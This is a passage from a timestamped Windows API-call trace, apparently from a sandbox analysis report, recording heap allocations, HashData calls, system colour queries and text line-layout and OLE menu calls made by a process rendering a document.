returned 0x0 [0172.561] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83010 | out: hHeap=0x5e0000) returned 1 [0172.561] GetSysColor (nIndex=15) returned 0xf0f0f0 [0172.562] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82f38 [0172.562] HashData (in: pbData=0x9f82f38, cbData=0x1, pbHash=0x198b70, cbHash=0x2 | out: pbHash=0x198b70) returned 0x0 [0172.562] HashData (in: pbData=0x198b6c, cbData=0x4, pbHash=0x198b78, cbHash=0x2 | out: pbHash=0x198b78) returned 0x0 [0172.562] HashData (in: pbData=0x9f82f3c, cbData=0xc, pbHash=0x198b74, cbHash=0x2 | out: pbHash=0x198b74) returned 0x0 [0172.562] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82f38 | out: hHeap=0x5e0000) returned 1 [0172.562] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f830e8 [0172.562] HashData (in: pbData=0x9f830e8, cbData=0x1, pbHash=0x198b70, cbHash=0x2 | out: pbHash=0x198b70) returned 0x0 [0172.562] HashData (in: pbData=0x198b6c, cbData=0x4, pbHash=0x198b78, cbHash=0x2 | out: pbHash=0x198b78) returned 0x0 [0172.562] HashData (in: pbData=0x9f830ec, cbData=0xc, pbHash=0x198b74, cbHash=0x2 | out: pbHash=0x198b74) returned 0x0 [0172.562] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f830e8 | out: hHeap=0x5e0000) returned 1 [0172.562] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82fb0 [0172.562] HashData (in: pbData=0x9f82fb0, cbData=0x1, pbHash=0x198488, cbHash=0x2 | out: pbHash=0x198488) returned 0x0 [0172.562] HashData (in: pbData=0x198484, cbData=0x4, pbHash=0x198490, cbHash=0x2 | out: pbHash=0x198490) returned 0x0 [0172.562] HashData (in: pbData=0x9f82fb4, cbData=0xc, pbHash=0x19848c, cbHash=0x2 | out: pbHash=0x19848c) returned 0x0 [0172.562] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82fb0 | out: hHeap=0x5e0000) returned 1 [0172.562] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82f20 [0172.562] HashData (in: pbData=0x9f82f20, cbData=0x1, pbHash=0x198488, cbHash=0x2 | out: pbHash=0x198488) returned 0x0 [0172.563] HashData (in: pbData=0x198484, cbData=0x4, pbHash=0x198490, cbHash=0x2 | out: pbHash=0x198490) returned 0x0 [0172.563] HashData (in: pbData=0x9f82f24, cbData=0xc, pbHash=0x19848c, cbHash=0x2 | out: pbHash=0x19848c) returned 0x0 [0172.563] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82f20 | out: hHeap=0x5e0000) returned 1 [0172.563] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83130 [0172.563] HashData (in: pbData=0x9f83130, cbData=0x1, pbHash=0x198488, cbHash=0x2 | out: pbHash=0x198488) returned 0x0 [0172.563] HashData (in: pbData=0x198484, cbData=0x4, pbHash=0x198490, cbHash=0x2 | out: pbHash=0x198490) returned 0x0 [0172.563] HashData (in: pbData=0x9f83134, cbData=0xc, pbHash=0x19848c, cbHash=0x2 | out: pbHash=0x19848c) returned 0x0 [0172.563] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83130 | out: hHeap=0x5e0000) returned 1 [0172.563] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83100 [0172.563] HashData (in: pbData=0x9f83100, cbData=0x1, pbHash=0x198488, cbHash=0x2 | out: pbHash=0x198488) returned 0x0 [0172.563] HashData (in: pbData=0x198484, cbData=0x4, pbHash=0x198490, cbHash=0x2 | out: pbHash=0x198490) returned 0x0 [0172.563] HashData (in: pbData=0x9f83104, cbData=0xc, pbHash=0x19848c, cbHash=0x2 | out: pbHash=0x19848c) returned 0x0 [0172.563] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83100 | out: hHeap=0x5e0000) returned 1 [0172.563] GetSysColor (nIndex=15) returned 0xf0f0f0 [0172.564] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f830b8 [0172.564] HashData (in: pbData=0x9f830b8, cbData=0x1, pbHash=0x198488, cbHash=0x2 | out: pbHash=0x198488) returned 0x0 [0172.564] HashData (in: pbData=0x198484, cbData=0x4, pbHash=0x198490, cbHash=0x2 | out: pbHash=0x198490) returned 0x0 [0172.564] HashData (in: pbData=0x9f830bc, cbData=0xc, pbHash=0x19848c, cbHash=0x2 | out: pbHash=0x19848c) returned 0x0 [0172.564] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f830b8 | out: hHeap=0x5e0000) returned 1 [0172.564] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82fe0 [0172.564] HashData (in: pbData=0x9f82fe0, cbData=0x1, pbHash=0x198488, cbHash=0x2 | out: pbHash=0x198488) returned 0x0 [0172.564] HashData (in: pbData=0x198484, cbData=0x4, pbHash=0x198490, cbHash=0x2 | out: pbHash=0x198490) returned 0x0 [0172.564] HashData (in: pbData=0x9f82fe4, cbData=0xc, pbHash=0x19848c, cbHash=0x2 | out: pbHash=0x19848c) returned 0x0 [0172.564] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82fe0 | out: hHeap=0x5e0000) returned 1 [0172.564] LsSetDoc () returned 0x0 [0172.564] LsCreateLine () returned 0x0 [0172.565] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0172.565] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0172.565] LsdnFinishRegular () returned 0x0 [0172.565] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0172.565] LsdnFinishRegular () returned 0x0 [0172.570] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0172.570] LsDisplayLine () returned 0x0 [0172.570] IOleInPlaceFrame:SetMenu (This=0xd90bc0, hmenuShared=0x1004, holemenu=0x0, hwndActiveObject=0x1) returned 0x0 [0172.570] IOleInPlaceFrame:SetMenu (This=0xd90ba0, hmenuShared=0x1004, holemenu=0x0, hwndActiveObject=0x0) returned 0x0 [0172.570] GetSysColor (nIndex=8) returned 0x0 [0172.570] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0172.570] GetSysColor (nIndex=8) returned 0x0 [0172.570] LsDestroyLine () returned 0x0 [0172.669] IOleInPlaceSite:CanInPlaceActivate (This=0xcfa380) returned 0x0 [0172.670] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6aa0 [0172.670] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f830a0 [0172.670] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7c48 [0172.670] HashData (in: pbData=0x9f830a4, cbData=0x4, pbHash=0x9f830a8, cbHash=0x2 | out: pbHash=0x9f830a8) returned 0x0 [0172.670] HashData (in: pbData=0x6d7c48, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.670] HashData (in: pbData=0x6d7c4a, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.670] HashData (in: pbData=0x6d7c4c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0172.670] HashData (in: pbData=0x6d7c54, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.670] HashData (in: pbData=0x6d7c5c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.670] HashData (in: pbData=0x6d7c64, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.670] HashData (in: pbData=0x6d7c66, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.670] HashData (in: pbData=0x6d7c68, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.670] HashData (in: pbData=0x6d7c70, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.670] HashData (in: pbData=0x197b14, cbData=0x4, pbHash=0x197b00, cbHash=0x2 | out: pbHash=0x197b00) returned 0x0 [0172.670] HashData (in: pbData=0x6d7c7c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0172.670] HashData (in: pbData=0x6d7c84, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.670] HashData (in: pbData=0x6d7c90, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0172.671] HashData (in: pbData=0x6d7c94, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0172.671] HashData (in: pbData=0x6d7c9c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.671] HashData (in: pbData=0x6d7ca8, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0172.671] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7c48 | out: hHeap=0x5e0000) returned 1 [0172.671] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f830a0 | out: hHeap=0x5e0000) returned 1 [0172.671] HashData (in: pbData=0x9ee6aa0, cbData=0x1, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0172.671] HashData (in: pbData=0x197b1c, cbData=0x4, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0172.671] HashData (in: pbData=0x9ee6aa4, cbData=0x4, pbHash=0x197b20, cbHash=0x2 | out: pbHash=0x197b20) returned 0x0 [0172.671] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6aa0 | out: hHeap=0x5e0000) returned 1 [0172.671] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6ac0 [0172.671] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82f20 [0172.671] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7c48 [0172.671] HashData (in: pbData=0x9f82f24, cbData=0x4, pbHash=0x9f82f28, cbHash=0x2 | out: pbHash=0x9f82f28) returned 0x0 [0172.671] HashData (in: pbData=0x6d7c48, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.671] HashData (in: pbData=0x6d7c4a, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.672] HashData (in: pbData=0x6d7c4c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0172.672] HashData (in: pbData=0x6d7c54, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.672] HashData (in: pbData=0x6d7c5c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.672] HashData (in: pbData=0x6d7c64, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.672] HashData (in: pbData=0x6d7c66, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.672] HashData (in: pbData=0x6d7c68, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.672] HashData (in: pbData=0x6d7c70, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.672] HashData (in: pbData=0x197b14, cbData=0x4, pbHash=0x197b00, cbHash=0x2 | out: pbHash=0x197b00) returned 0x0 [0172.672] HashData (in: pbData=0x6d7c7c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0172.672] HashData (in: pbData=0x6d7c84, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.672] HashData (in: pbData=0x6d7c90, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0172.672] HashData (in: pbData=0x6d7c94, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0172.672] HashData (in: pbData=0x6d7c9c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.672] HashData (in: pbData=0x6d7ca8, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0172.672] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7c48 | out: hHeap=0x5e0000) returned 1 [0172.672] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82f20 | out: hHeap=0x5e0000) returned 1 [0172.672] HashData (in: pbData=0x9ee6ac0, cbData=0x1, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0172.672] HashData (in: pbData=0x197b1c, cbData=0x4, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0172.672] HashData (in: pbData=0x9ee6ac4, cbData=0x4, pbHash=0x197b20, cbHash=0x2 | out: pbHash=0x197b20) returned 0x0 [0172.672] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6ac0 | out: hHeap=0x5e0000) returned 1 [0172.672] GetFocus () returned 0x0 [0172.673] EnumChildWindows (hWndParent=0x103e2, lpEnumFunc=0x6e0775e0, lParam=0x19795f) returned 0 [0172.673] GetFocus () returned 0x0 [0172.673] EnumChildWindows (hWndParent=0x103e2, lpEnumFunc=0x6e0775e0, lParam=0x19796b) returned 0 [0172.673] GetSysColor (nIndex=15) returned 0xf0f0f0 [0172.673] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7d28 | out: hHeap=0x5e0000) returned 1 [0172.673] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d77e8 [0172.673] _CIsqrt () returned 0x407b027f [0172.673] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6b80 [0172.673] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0172.674] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0172.674] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6b80 | out: hHeap=0x5e0000) returned 1 [0172.674] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x54) returned 0x6ddad8 [0172.674] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0172.674] HashData (in: pbData=0xd950b0, cbData=0x28, pbHash=0x19732c, cbHash=0x4 | out: pbHash=0x19732c) returned 0x0 [0172.675] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6ddad8 | out: hHeap=0x5e0000) returned 1 [0172.675] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6ab0 [0172.675] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83160 [0172.675] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7778 [0172.675] HashData (in: pbData=0x9f83164, cbData=0x4, pbHash=0x9f83168, cbHash=0x2 | out: pbHash=0x9f83168) returned 0x0 [0172.675] HashData (in: pbData=0x6d7778, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.675] HashData (in: pbData=0x6d777a, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.675] HashData (in: pbData=0x6d777c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0172.675] HashData (in: pbData=0x6d7784, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.675] HashData (in: pbData=0x6d778c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.675] HashData (in: pbData=0x6d7794, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.675] HashData (in: pbData=0x6d7796, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.676] HashData (in: pbData=0x6d7798, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.676] HashData (in: pbData=0x6d77a0, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.676] HashData (in: pbData=0x197b14, cbData=0x4, pbHash=0x197b00, cbHash=0x2 | out: pbHash=0x197b00) returned 0x0 [0172.676] HashData (in: pbData=0x6d77ac, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0172.676] HashData (in: pbData=0x6d77b4, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.676] HashData (in: pbData=0x6d77c0, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0172.676] HashData (in: pbData=0x6d77c4, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0172.676] HashData (in: pbData=0x6d77cc, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.676] HashData (in: pbData=0x6d77d8, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0172.676] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7778 | out: hHeap=0x5e0000) returned 1 [0172.676] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83160 | out: hHeap=0x5e0000) returned 1 [0172.676] HashData (in: pbData=0x9ee6ab0, cbData=0x1, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0172.676] HashData (in: pbData=0x197b1c, cbData=0x4, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0172.676] HashData (in: pbData=0x9ee6ab4, cbData=0x4, pbHash=0x197b20, cbHash=0x2 | out: pbHash=0x197b20) returned 0x0 [0172.676] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6ab0 | out: hHeap=0x5e0000) returned 1 [0172.676] GetFocus () returned 0x0 [0172.676] EnumChildWindows (hWndParent=0x103e2, lpEnumFunc=0x6e0775e0, lParam=0x197acf) returned 0 [0172.677] GetFocus () returned 0x0 [0172.677] EnumChildWindows (hWndParent=0x103e2, lpEnumFunc=0x6e0775e0, lParam=0x197a8b) returned 0 [0172.677] GetFocus () returned 0x0 [0172.677] EnumChildWindows (hWndParent=0x103e2, lpEnumFunc=0x6e0775e0, lParam=0x197a97) returned 0 [0172.677] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0172.677] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0172.677] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0172.681] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0172.681] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0172.681] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0172.682] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82f20 [0172.682] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0172.683] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0172.683] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0172.683] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0172.683] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0172.683] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0172.683] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0172.684] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f830a0 [0172.686] GetSysColor (nIndex=15) returned 0xf0f0f0 [0172.686] GetSysColor (nIndex=15) returned 0xf0f0f0 [0172.687] GetSysColor (nIndex=15) returned 0xf0f0f0 [0172.687] GetSysColor (nIndex=15) returned 0xf0f0f0 [0172.688] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0172.688] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83118 [0172.689] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82f20 | out: hHeap=0x5e0000) returned 1 [0172.689] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f830a0 | out: hHeap=0x5e0000) returned 1 [0172.689] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83118 | out: hHeap=0x5e0000) returned 1 [0172.689] LsSetDoc () returned 0x0 [0172.689] LsCreateLine () returned 0x0 [0172.690] LsDisplayLine () returned 0x0 [0172.693] LsDestroyLine () returned 0x0 [0172.693] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6a90 [0172.693] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82ff8 [0172.693] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7708 [0172.693] HashData (in: pbData=0x9f82ffc, cbData=0x4, pbHash=0x9f83000, cbHash=0x2 | out: pbHash=0x9f83000) returned 0x0 [0172.693] HashData (in: pbData=0x6d7708, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.693] HashData (in: pbData=0x6d770a, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.693] HashData (in: pbData=0x6d770c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0172.693] HashData (in: pbData=0x6d7714, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.693] HashData (in: pbData=0x6d771c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.693] HashData (in: pbData=0x6d7724, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.693] HashData (in: pbData=0x6d7726, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.693] HashData (in: pbData=0x6d7728, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.693] HashData (in: pbData=0x6d7730, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.693] HashData (in: pbData=0x197b14, cbData=0x4, pbHash=0x197b00, cbHash=0x2 | out: pbHash=0x197b00) returned 0x0 [0172.693] HashData (in: pbData=0x6d773c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0172.693] HashData (in: pbData=0x6d7744, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.693] HashData (in: pbData=0x6d7750, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0172.693] HashData (in: pbData=0x6d7754, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0172.696] HashData (in: pbData=0x6d775c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.696] HashData (in: pbData=0x6d7768, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0172.696] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7708 | out: hHeap=0x5e0000) returned 1 [0172.696] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82ff8 | out: hHeap=0x5e0000) returned 1 [0172.696] HashData (in: pbData=0x9ee6a90, cbData=0x1, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0172.696] HashData (in: pbData=0x197b1c, cbData=0x4, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0172.696] HashData (in: pbData=0x9ee6a94, cbData=0x4, pbHash=0x197b20, cbHash=0x2 | out: pbHash=0x197b20) returned 0x0 [0172.696] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6a90 | out: hHeap=0x5e0000) returned 1 [0172.696] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6a90 [0172.696] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82ed8 [0172.696] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d78c8 [0172.696] HashData (in: pbData=0x9f82edc, cbData=0x4, pbHash=0x9f82ee0, cbHash=0x2 | out: pbHash=0x9f82ee0) returned 0x0 [0172.697] HashData (in: pbData=0x6d78c8, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.697] HashData (in: pbData=0x6d78ca, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.697] HashData (in: pbData=0x6d78cc, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0172.697] HashData (in: pbData=0x6d78d4, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.697] HashData (in: pbData=0x6d78dc, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.697] HashData (in: pbData=0x6d78e4, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.697] HashData (in: pbData=0x6d78e6, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.697] HashData (in: pbData=0x6d78e8, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.697] HashData (in: pbData=0x6d78f0, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.697] HashData (in: pbData=0x197b14, cbData=0x4, pbHash=0x197b00, cbHash=0x2 | out: pbHash=0x197b00) returned 0x0 [0172.697] HashData (in: pbData=0x6d78fc, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0172.698] HashData (in: pbData=0x6d7904, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.698] HashData (in: pbData=0x6d7910, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0172.698] HashData (in: pbData=0x6d7914, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0172.698] HashData (in: pbData=0x6d791c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0172.698] HashData (in: pbData=0x6d7928, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0172.698] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d78c8 | out: hHeap=0x5e0000) returned 1 [0172.698] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82ed8 | out: hHeap=0x5e0000) returned 1 [0172.698] HashData (in: pbData=0x9ee6a90, cbData=0x1, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0172.698] HashData (in: pbData=0x197b1c, cbData=0x4, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0172.698] HashData (in: pbData=0x9ee6a94, cbData=0x4, pbHash=0x197b20, cbHash=0x2 | out: pbHash=0x197b20) returned 0x0 [0172.698] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6a90 | out: hHeap=0x5e0000) returned 1 [0172.699] GetSysColor (nIndex=15) returned 0xf0f0f0 [0172.699] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d77e8 